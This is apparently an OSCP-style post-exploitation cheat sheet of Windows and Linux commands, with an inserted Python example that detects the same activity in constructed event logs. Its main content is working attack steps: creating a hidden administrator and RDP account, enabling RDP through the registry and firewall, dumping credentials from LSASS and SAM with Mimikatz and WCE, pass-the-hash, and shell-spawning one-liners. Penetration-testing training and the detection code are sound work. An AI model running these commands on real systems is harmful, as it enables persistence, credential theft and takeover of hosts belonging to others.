Securable - OSCP cheat sheet
Post exploitation
Don't.stop.here.you.are.only.halfway.
Proof.txt
Linux
cat /root/proof.txt
Windows
type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
Windows
Add RDP user
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add
Enable RDP
Via registry:
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
Add firewall rule:
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
Rdesktop resolution
rdesktop -g 1024x768 x.x.x.x
Passwords and hashes
Mimikatz
Extract passwords, keys, pin codes, tickets from "lsass" memory:
privilege::debug
log sekurlsa.log
sekurlsa::logonpasswords
Pass-the-hash
privilege::debug
log sekurlsa.log
sekurlsa::pth /user:Administrator /domain:acme /ntlm:893efccda23744616cf7accab23ascbb /run:cmd
Elevate token
privilege::debug
log sekurlsa.log
token::elevate
Dump SAM
privilege::debug
log sekurlsa.log
lsadump::sam
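Every step in the "Add RDP user", "Enable RDP" and Mimikatz sections above leaves a host artifact: a 4732 event for the group membership change, a registry write that sets fDenyTSConnections to 0, and a process handle to lsass.exe with memory-read rights. The following is an added example, not part of the original cheat sheet, showing the detection logic a blue team would run over such telemetry. The event records are constructed for the example and only loosely follow the Windows Security and Sysmon field names; the rule names, thresholds and the `SAMPLE_EVENTS` list are assumptions of this example.

```python
"""Constructed example: flag the host artifacts of the post-exploitation
steps on this page (RDP user/group changes, fDenyTSConnections set to 0,
LSASS memory access) in a stream of event records."""
from dataclasses import dataclass

# Constructed sample events, shaped after Security 4720/4732 and Sysmon 10/13
# fields. Not captured from any real host; the account names are made up.
SAMPLE_EVENTS = [
    {"channel": "Security", "event_id": 4720, "target_user": "hodor", "subject_user": "svc_deploy"},
    {"channel": "Security", "event_id": 4732, "group": "Administrators",
     "member": "hodor", "subject_user": "svc_deploy"},
    {"channel": "Security", "event_id": 4732, "group": "Remote Desktop Users",
     "member": "hodor", "subject_user": "svc_deploy"},
    {"channel": "Sysmon", "event_id": 13, "image": "C:\\Windows\\System32\\reg.exe",
     "target_object": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections",
     "details": "DWORD (0x00000000)"},
    {"channel": "Sysmon", "event_id": 10, "source_image": "C:\\Users\\Public\\m.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1010"},
    # Benign noise: query-only handle to lsass and an ordinary group change.
    {"channel": "Sysmon", "event_id": 10, "source_image": "C:\\Windows\\System32\\csrss.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1400"},
    {"channel": "Security", "event_id": 4732, "group": "Users",
     "member": "jdoe", "subject_user": "helpdesk"},
]

PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}
RDP_DENY_KEY = "\\control\\terminal server\\fdenytsconnections"
PROCESS_VM_READ = 0x0010  # access right required to read another process's memory


@dataclass(frozen=True)
class Alert:
    rule: str
    subject: str
    detail: str


def check_group_add(ev):
    """4732: a member was added to a local group that grants logon rights."""
    if ev.get("channel") != "Security" or ev.get("event_id") != 4732:
        return None
    if ev.get("group", "").lower() not in PRIVILEGED_GROUPS:
        return None
    return Alert("privileged_group_add", ev["member"],
                 f'{ev["member"]} added to "{ev["group"]}" by {ev["subject_user"]}')


def check_rdp_enabled(ev):
    """Sysmon 13: fDenyTSConnections written with value 0 (RDP enabled)."""
    if ev.get("channel") != "Sysmon" or ev.get("event_id") != 13:
        return None
    if not ev.get("target_object", "").lower().endswith(RDP_DENY_KEY):
        return None
    # Sysmon renders DWORD values as "DWORD (0x........)"; zero enables RDP.
    if "0x00000000" not in ev.get("details", ""):
        return None
    return Alert("rdp_enabled_via_registry", ev["image"],
                 f'fDenyTSConnections set to 0 by {ev["image"]}')


def check_lsass_access(ev):
    """Sysmon 10: a process opened lsass.exe with memory-read rights."""
    if ev.get("channel") != "Sysmon" or ev.get("event_id") != 10:
        return None
    if not ev.get("target_image", "").lower().endswith("\\lsass.exe"):
        return None
    mask = int(ev.get("granted_access", "0x0"), 16)
    if not mask & PROCESS_VM_READ:
        return None  # query-only handles do not read credential material
    return Alert("lsass_memory_read", ev["source_image"],
                 f'{ev["source_image"]} opened lsass.exe with 0x{mask:04x}')


RULES = (check_group_add, check_rdp_enabled, check_lsass_access)


def detect(events):
    """Run every rule over every event; return the alerts in event order."""
    return [hit for ev in events for rule in RULES if (hit := rule(ev))]


def rdp_backdoor_accounts(events):
    """Accounts created (4720) and then granted RDP or admin rights (4732)
    in the same stream: the footprint of the "Add RDP user" sequence."""
    created = {ev["target_user"].lower() for ev in events if ev.get("event_id") == 4720}
    return sorted({ev["member"] for ev in events
                   if ev.get("event_id") == 4732
                   and ev.get("group", "").lower() in PRIVILEGED_GROUPS
                   and ev["member"].lower() in created})


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.detail}")
    print("new accounts given RDP/admin rights:", rdp_backdoor_accounts(SAMPLE_EVENTS))
```

The access-mask check matters more than the image name: legitimate system processes routinely hold query-only handles to lsass.exe, so alerting on every open would drown the signal, while any handle carrying PROCESS_VM_READ from an unexpected image is worth a look regardless of how the tool is named.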
Windows Credential Editor (WCE)
Security tool that can be used to extract cleartext passwords and NTLM hashes from a Windows host. Administrator privileges are required.
https://www.ampliasecurity.com/research/windows-credentials-editor/
C:\> wce -w
Networking
Is there a connection with another host?
netstat -ano
Hosts file
C:\WINDOWS\System32\drivers\etc\hosts
Firewall config
netsh firewall show state
netsh firewall show config
netsh dump
PowerShell tools
Empire
EmpireProject/Empire (GitHub): Empire is a PowerShell and Python post-exploitation agent.
PowerSploit
PowerShellMafia/PowerSploit (GitHub): PowerSploit - A PowerShell Post-Exploitation Framework
Linux
Spawn TTY shell
python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import os; os.system("/bin/bash")'
/bin/bash -i
/bin/sh -i
perl -e 'exec "/bin/sh";'